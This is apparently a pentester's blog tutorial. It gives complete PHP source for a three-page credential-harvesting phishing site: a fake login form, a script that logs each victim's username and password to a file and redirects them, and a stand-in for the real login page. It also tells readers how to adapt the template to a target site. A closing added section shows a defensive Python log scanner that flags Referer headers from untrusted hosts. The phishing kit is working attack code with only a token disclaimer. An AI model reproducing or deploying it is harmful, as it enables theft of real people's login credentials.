A Simple Phishing (Credential Harvester) Website Template

As you already know, Kali Linux comes with the Social-Engineer Toolkit (SET), which can clone the sign-in page of a target website and host the copy from your own machine to retrieve the credentials.

But sometimes this simply does not work: the website may be protected somehow against automatic cloning. This happened to me on a recent pentest case. In that situation it becomes necessary to get our hands dirty and prepare the phishing page manually. Here I want to share a simple credential harvester template to start from in a similar situation. It is not rocket science, but you may want to keep it in your bag 🙂

Anyhow, in my scenario I prepared three PHP pages:

1) fake-login.php: This is where the victim inputs their credentials.

2) redirect.php: This is where we log the retrieved credentials and redirect the user to original-login.php.

3) original-login.php: This is the real website hosted by the target system, so the user wouldn’t realize where s/he just was.

The code for fake-login.php:

<html>

<head>

Company Information System

</head>

<body>

<form id=”contact_form” action=’redirect.php’ method=”post”>

<label>Username: <input class=”textfield” name=”username” type=”text” value=”” /></label>

<label>Password: <input class=”textfield” name=”password” type=”text” value=”” /></label>

<input type=”submit” name=”Submit” value=”Submit”/>

</form>

</body>

</html>

The code for redirect.php:

<?php

$username = $_REQUEST[‘username’];

$password = $_REQUEST[‘password’];

if (($username != null) and ($password != null)) {

echo $username . “ ” . $password;

$data = $username . “ ” . $password;

$ifp = fopen(‘log.txt’, ‘a’);

fwrite($ifp, $data.PHP_EOL);

fclose($ifp);

}

function Redirect($url, $permanent = false) {

if (headers_sent() === false) {

header(‘Location: ‘ . $url, true, ($permanent === true) ? 301 : 302);

}

exit(); }

Redirect(‘http://localhost/phishing/original-login.php’, false);

?>

And finally the code for original-login.php:

<html>

<head>

Company Information System Original Website

</head>

<body>

<form id=“contact_form” action=’original-login.php’ method=“post”>

<label>Username: <input class=”textfield” name=”username” type=”text” value=“” /></label>

<label>Password: <input class=“textfield” name=“password” type=“text” value=“” /></label>

<input type=“submit” name=“Submit” value=“Submit”/>

</form>

</body>

</html>

You can use this code sample as a template and customize it for your target website. Just download the source code of the target website, make sure the username and password fields match the code above, and make it go to the redirect.php page after that. Make sure that the directory where you host these pages allows write access to enable logging.

Please use this code only for legal purposes, don’t be dumb, it is unnecessary.
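
Seen from the defending side, the redirect at the end of redirect.php means the victim's browser requests the real login page straight after the fake one, and that request usually carries a Referer naming the fake host. The Python below is an added example, not code from the original post: it scans the real site's access log for such arrivals, assuming Apache/Nginx combined log format, a constructed trusted host `portal.example.com`, and constructed sample log lines.

```python
import re
from urllib.parse import urlsplit

# Assumptions (not from the original post): combined log format and the
# set of hosts that legitimately link to the login page.
LOGIN_PATH = "/phishing/original-login.php"   # path of the real login page
TRUSTED_REFERER_HOSTS = {"portal.example.com"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def foreign_login_referers(lines, login_path=LOGIN_PATH,
                           trusted=TRUSTED_REFERER_HOSTS):
    """Return (client_ip, timestamp, referer_host) for every GET of the
    login page whose Referer host is outside the trusted set."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "GET":
            continue                      # unparsable line or not a page load
        if urlsplit(m["target"]).path != login_path:
            continue                      # some other resource
        referer = m["referer"]
        if referer in ("", "-"):
            continue                      # no Referer sent: nothing to compare
        host = (urlsplit(referer).hostname or "").lower()
        if host and host not in trusted:
            hits.append((m["ip"], m["ts"], host))
    return hits

# Constructed sample lines (documentation IP ranges, example hosts).
_REQ = '"GET /phishing/original-login.php HTTP/1.1" 200 512'
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/Mar/2024:09:14:02 +0000] {_REQ} '
    '"http://login-portal.example.net/" "Mozilla/5.0"',
    f'198.51.100.23 - - [12/Mar/2024:09:15:40 +0000] {_REQ} '
    '"https://portal.example.com/home" "Mozilla/5.0"',
    f'198.51.100.24 - - [12/Mar/2024:09:16:11 +0000] {_REQ} "-" "Mozilla/5.0"',
    '192.0.2.50 - - [12/Mar/2024:09:17:30 +0000] "GET /index.php HTTP/1.1" '
    '200 100 "http://other.example.org/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, host in foreign_login_referers(SAMPLE_LOG):
        print(f"{ts} {ip} reached the login page from {host}")
```

The check only fires when a Referer is present, so treat hits as leads for takedown and for resetting the affected user's password rather than as complete coverage.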